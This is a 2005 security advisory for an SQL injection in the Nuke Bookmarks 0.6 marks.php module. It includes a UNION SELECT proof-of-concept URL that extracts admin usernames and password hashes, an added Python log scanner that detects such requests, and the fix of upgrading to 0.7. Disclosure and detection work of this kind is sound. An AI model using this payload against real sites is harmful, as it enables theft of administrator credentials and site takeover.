Nuke Bookmarks Marks.php SQL Injection Vulnerability
BID:12908
Info
| Bugtraq ID: | 12908 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2005 12:00AM |
| Updated: | Mar 26 2005 12:00AM |
| Credit: | Discovery credited to Gerardo Astharot Di Giacomo <[email protected]>. |
| Vulnerable: | Nuke Bookmarks Nuke Bookmarks 0.6 |
| Not Vulnerable: | |
Discussion
Nuke Bookmarks is prone to an SQL injection vulnerability.
This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
Exploit / POC
No exploit code is required.
The following proof of concept was supplied:
http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors
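For defenders reviewing web server logs, the sketch below flags requests to the Bookmarks marks file whose category parameter is not a plain integer, which is the shape of the request above. It is an added example, not code from the advisory or from Nuke Bookmarks; the combined log format, the function names, and the assumption that a legitimate category is a non-negative integer id are all assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common/combined access log format: capture client address and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)[^"]*"')

def suspicious_category(target):
    """Return the decoded category value when a request to the Bookmarks
    marks file carries a non-integer category; otherwise return None."""
    query = urlsplit(target).query
    params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
    if "bookmarks" not in [v.lower() for v in params.get("name", [])]:
        return None
    if "marks" not in [v.lower() for v in params.get("file", [])]:
        return None
    for raw in params.get("category", []):
        value = unquote(raw)  # undo a second layer of percent-encoding
        # Assumption: a legitimate category is a plain non-negative integer id.
        if not re.fullmatch(r"\d+", value):
            return value
    return None

def scan(lines):
    """Return (client_address, decoded_category) for every flagged log line."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        value = suspicious_category(match.group(2))
        if value is not None:
            hits.append((match.group(1), value))
    return hits

# Constructed sample log lines (documentation address ranges); the second
# request repeats the proof-of-concept query string shown in this entry.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Mar/2005:10:00:01 +0000] "GET /modules.php?name=Bookmarks&file=marks&catname=1&category=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Mar/2005:10:00:09 +0000] "GET /modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors HTTP/1.1" 200 812',
    '203.0.113.5 - - [26/Mar/2005:10:01:30 +0000] "GET /modules.php?name=News&file=article&sid=4 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: non-integer category {value!r}")
```

A hit in the logs only shows that such a request was received; whether it succeeded depends on the installed version.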
Solution / Fix
Solution:
The vendor has addressed this issue in Nuke Bookmarks 0.7.
Nuke Bookmarks Nuke Bookmarks 0.6
-
Nuke Bookmarks Nuke Bookmarks 0.7
http://prdownloads.sourceforge.net/nukebookmarks/bookmarks-0.7.tgz?download
References
References:
- Home Page (Nuke Bookmarks)
- ZH2005-03SA -- multiple vulnerabilities in NukeBookmarks .6 (Gerardo Astharot Di Giacomo)